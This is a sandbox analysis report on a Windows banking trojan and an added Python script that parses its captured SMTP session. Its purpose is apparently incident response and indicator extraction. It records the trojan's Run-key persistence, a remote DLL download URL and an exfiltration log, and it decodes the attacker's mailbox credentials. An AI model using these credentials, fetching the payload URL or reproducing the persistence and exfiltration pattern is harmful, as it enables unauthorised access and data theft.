Analysis Date: 2014-03-27 10:29:20
MD5: 773c7d8f6bdc22e33de7cca40a0549e2
SHA1: 445eca22fac8968ee347e953261b8e6148b11a20

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: b705b96e253da557e73373d697b34fb1 sha1: 75e3750d2f964793ee4cb25fc755062e8231e1a6 size: 117760
Section .rsrc: md5: 155bf3cc0f1989fa5c363823069bf8cf sha1: 8b017842bb13ef0f61023a50abf7c3516daa7b1d size: 5632
Timestamp: 2005-12-30 13:40:19
Version:
  LegalCopyright: Microsoft Corporation
  InternalName: shoop5
  FileVersion: ..55
  CompanyName: Microsoft Corporation
  LegalTrademarks: Microsoft Corporation
  Comments: shoop5
  ProductName: shoop5
  ProductVersion: ..55
  FileDescription: shoop5.exe
  OriginalFilename: shoop5.exe
Packer: PECompact 2.0x Heuristic Mode -> Jeremy Collake
PEhash: c303db1492fbb24701fce2d8d5c887bb233fd573
IMPhash: 09d0478591d4f788cb3e5ea416c25237
AV clamav: Trojan.Spy.Banker-981
AV avg: PSW.Banker.YVX
AV avira: TR/Crypt.FKM.Gen
AV mcafee: PWS-Banker

Runtime Details:

Process
↳ C:\malware.exe

Creates File: c:\windows\paityom35.exe
Creates Process: c:\windows\paityom35.exe

Process
↳ c:\windows\paityom35.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Service System ➝ "c:\windows\paityom35.exe"\x00
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Run\Service System ➝ "c:\windows\paityom35.exe"\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: \Device\Afd\AsyncSelectHlp
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\ieupdate.dat
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFE3F3.tmp
Winsock DNS: www.supernet.speedserv.com
Winsock URL: http://www.supernet.speedserv.com/downloads/winlockdll.dll

Network Details:

DNS: smtp.mail.eu.am0.yahoodns.net (Type: A) ➝ 188.125.69.59
DNS: www.supernet.speedserv.com (Type: A)
DNS: smtp.mail.yahoo.com.hk (Type: A)
Flows: TCP 192.168.1.1:1032 ➝ 188.125.69.59:25
SMTP: loryoyom30@pop.com.br

Raw Pcap
0x00000000 (00000)   48454c4f 20434f4d 50555445 522d5858   HELO COMPUTER-XX
0x00000010 (00016)   58585858 0d0a4155 5448204c 4f47494e   XXXX..AUTH LOGIN
0x00000020 (00032)   0d0a5a58 686c6347 68774e41 3d3d0d0a   ..ZXhlcGhwNA==..
0x00000030 (00048)   4e445533 4d7a4132 0d0a4d41 494c2046   NDU3MzA2..MAIL F
0x00000040 (00064)   524f4d3a 3c657865 70687034 40796168   ROM:<exephp4@yah
0x00000050 (00080)   6f6f2e63 6f6d2e68 6b3e0d0a 52435054   oo.com.hk>..RCPT
0x00000060 (00096)   20544f3a 3c636169 78617940 74657272    TO:<caixay@terr
0x00000070 (00112)   612e636f 6d3e0d0a 52435054 20544f3a   a.com>..RCPT TO:
0x00000080 (00128)   3c6c6f72 796f796f 6d333040 706f702e   <loryoyom30@pop.
0x00000090 (00144)   636f6d2e 62723e0d 0a444154 410d0a46   com.br>..DATA..F
0x000000a0 (00160)   726f6d3a 20434f4d 50555445 522d5858   rom: COMPUTER-XX
0x000000b0 (00176)   58585858 406f6f69 646f2e63 6f6d2e62   XXXX@ooido.com.b
0x000000c0 (00192)   720d0a54 6f3a2070 65676f75 646f6964   r..To: pegoudoid
0x000000d0 (00208)   6f406f6f 69646f2e 636f6d2e 62720d0a   o@ooido.com.br..
0x000000e0 (00224)   44617465 3a205468 75727364 6179202c   Date: Thursday ,
0x000000f0 (00240)   20323720 4d617220 32303134 2031303a    27 Mar 2014 10:
0x00000100 (00256)   31333a34 3520414d 0d0a5375 626a6563   13:45 AM..Subjec
0x00000110 (00272)   743a204e 6f766f48 6b203921 33212020   t: NovoHk 9!3!  
0x00000120 (00288)   32372f30 332f3134 2031303a 31330d0a   27/03/14 10:13..
0x00000130 (00304)   582d4d61 696c6572 3a204d69 63726f73   X-Mailer: Micros
0x00000140 (00320)   6f667420 436f7270 6f726174 696f6e20   oft Corporation 
0x00000150 (00336)   2d204d69 63726f73 6f66740d 0a0d0a20   - Microsoft.... 
0x00000160 (00352)   200d0a45 72726f3a 206e6f20 61677561    ..Erro: no agua
0x00000170 (00368)   72646f20 646f2070 61672e20 646f2064   rdo do pag. do d
0x00000180 (00384)   6f776e6c 6f61642c 20652076 61692070   ownload, e vai p
0x00000190 (00400)   61676172 2e2e2e0d 0a4d7367 20646120   agar.....Msg da 
0x000001a0 (00416)   76657273 e36f2e3a 20352e30 2e310d0a   vers.o.: 5.0.1..
0x000001b0 (00432)   0d0a2e0d 0a0d0a51 5549540d 0a         .......QUIT..
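The hex dump above is the client half of one SMTP session (no server replies were captured), and it contains everything a responder needs: the sample authenticates with AUTH LOGIN, whose two base64 lines decode to the mailbox username and password, then sends a status mail whose Portuguese body reads roughly "Error: waiting on the download page, and it is going to pay... Msg from version: 5.0.1". The script below is an added example, not part of the sandbox report; its only input is the raw dump copied verbatim from this page. It re-joins the hex columns into the TCP payload, walks the SMTP commands, decodes the credentials and separates the envelope (MAIL FROM / RCPT TO) from the From:/To: headers, which name different addresses.

```python
"""Added example: rebuild the SMTP exfil session from the 'Raw Pcap' hex dump
above and recover the hard-coded AUTH LOGIN credentials. RAW_PCAP is copied
from the report; the capture holds client-to-server bytes only."""
import base64
import re

RAW_PCAP = """\
0x00000000 (00000)   48454c4f 20434f4d 50555445 522d5858   HELO COMPUTER-XX
0x00000010 (00016)   58585858 0d0a4155 5448204c 4f47494e   XXXX..AUTH LOGIN
0x00000020 (00032)   0d0a5a58 686c6347 68774e41 3d3d0d0a   ..ZXhlcGhwNA==..
0x00000030 (00048)   4e445533 4d7a4132 0d0a4d41 494c2046   NDU3MzA2..MAIL F
0x00000040 (00064)   524f4d3a 3c657865 70687034 40796168   ROM:<exephp4@yah
0x00000050 (00080)   6f6f2e63 6f6d2e68 6b3e0d0a 52435054   oo.com.hk>..RCPT
0x00000060 (00096)   20544f3a 3c636169 78617940 74657272    TO:<caixay@terr
0x00000070 (00112)   612e636f 6d3e0d0a 52435054 20544f3a   a.com>..RCPT TO:
0x00000080 (00128)   3c6c6f72 796f796f 6d333040 706f702e   <loryoyom30@pop.
0x00000090 (00144)   636f6d2e 62723e0d 0a444154 410d0a46   com.br>..DATA..F
0x000000a0 (00160)   726f6d3a 20434f4d 50555445 522d5858   rom: COMPUTER-XX
0x000000b0 (00176)   58585858 406f6f69 646f2e63 6f6d2e62   XXXX@ooido.com.b
0x000000c0 (00192)   720d0a54 6f3a2070 65676f75 646f6964   r..To: pegoudoid
0x000000d0 (00208)   6f406f6f 69646f2e 636f6d2e 62720d0a   o@ooido.com.br..
0x000000e0 (00224)   44617465 3a205468 75727364 6179202c   Date: Thursday ,
0x000000f0 (00240)   20323720 4d617220 32303134 2031303a    27 Mar 2014 10:
0x00000100 (00256)   31333a34 3520414d 0d0a5375 626a6563   13:45 AM..Subjec
0x00000110 (00272)   743a204e 6f766f48 6b203921 33212020   t: NovoHk 9!3!
0x00000120 (00288)   32372f30 332f3134 2031303a 31330d0a   27/03/14 10:13..
0x00000130 (00304)   582d4d61 696c6572 3a204d69 63726f73   X-Mailer: Micros
0x00000140 (00320)   6f667420 436f7270 6f726174 696f6e20   oft Corporation
0x00000150 (00336)   2d204d69 63726f73 6f66740d 0a0d0a20   - Microsoft....
0x00000160 (00352)   200d0a45 72726f3a 206e6f20 61677561    ..Erro: no agua
0x00000170 (00368)   72646f20 646f2070 61672e20 646f2064   rdo do pag. do d
0x00000180 (00384)   6f776e6c 6f61642c 20652076 61692070   ownload, e vai p
0x00000190 (00400)   61676172 2e2e2e0d 0a4d7367 20646120   agar.....Msg da
0x000001a0 (00416)   76657273 e36f2e3a 20352e30 2e310d0a   vers.o.: 5.0.1..
0x000001b0 (00432)   0d0a2e0d 0a0d0a51 5549540d 0a         .......QUIT..
"""

HEX_TOKEN = re.compile(r"[0-9a-fA-F]+")


def hexdump_to_bytes(dump: str) -> bytes:
    """Re-join the hex columns of a 16-bytes-per-line dump. The offset and
    '(decimal)' columns are skipped; we stop a line after 16 bytes or at the
    first non-hex token, so the ASCII gutter is never mistaken for data."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not tokens[0].startswith("0x"):
            continue
        count = 0
        for tok in tokens[2:]:
            if count >= 16 or len(tok) % 2 or not HEX_TOKEN.fullmatch(tok):
                break
            out += bytes.fromhex(tok)
            count += len(tok) // 2
    return bytes(out)


def _angle_addr(line: str) -> str:
    """'MAIL FROM:<a@b>' -> 'a@b'."""
    m = re.search(r"<([^>]*)>", line)
    return m.group(1) if m else line.split(":", 1)[1].strip()


def parse_smtp_session(payload: bytes) -> dict:
    """Walk the client side of an SMTP dialogue: greeting, AUTH LOGIN blobs,
    envelope, and the DATA section split into headers and body."""
    lines = payload.decode("latin-1").split("\r\n")   # body has a raw 0xE3 ('ã')
    s = {"helo": None, "auth_user": None, "auth_password": None,
         "mail_from": None, "rcpt_to": [], "headers": {}, "body": "", "quit": False}
    i = 0
    while i < len(lines):
        line, verb = lines[i], lines[i].upper()
        if verb.startswith(("HELO ", "EHLO ")):
            s["helo"] = line[5:].strip()
        elif verb == "AUTH LOGIN":
            # No server prompts in the capture, so the base64 username and
            # password follow the command directly on the next two lines.
            s["auth_user"] = base64.b64decode(lines[i + 1]).decode("latin-1")
            s["auth_password"] = base64.b64decode(lines[i + 2]).decode("latin-1")
            i += 2
        elif verb.startswith("MAIL FROM:"):
            s["mail_from"] = _angle_addr(line)
        elif verb.startswith("RCPT TO:"):
            s["rcpt_to"].append(_angle_addr(line))
        elif verb == "DATA":
            j = i + 1
            while j < len(lines) and lines[j] != "":       # headers
                name, _, value = lines[j].partition(":")
                s["headers"][name.strip()] = value.strip()
                j += 1
            j += 1                                          # blank separator
            body = []
            while j < len(lines) and lines[j] != ".":      # body up to lone '.'
                body.append(lines[j])
                j += 1
            s["body"] = "\r\n".join(body).strip()
            i = j
        elif verb == "QUIT":
            s["quit"] = True
        i += 1
    return s


if __name__ == "__main__":
    session = parse_smtp_session(hexdump_to_bytes(RAW_PCAP))
    print("SMTP account :", session["auth_user"], "/", session["auth_password"])
    print("Envelope     :", session["mail_from"], "->", ", ".join(session["rcpt_to"]))
    print("Subject      :", session["headers"].get("Subject"))
    print("Body         :", session["body"].replace("\r\n", " | "))
```

The recovered account (username exephp4, password 457306, used against the Yahoo HK MX resolved above and reached over TCP/25) and the two envelope recipients are the indicators to block and hunt for; the From: and To: headers at ooido.com.br do not match the envelope and should not be treated as the real sender or destination.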


Strings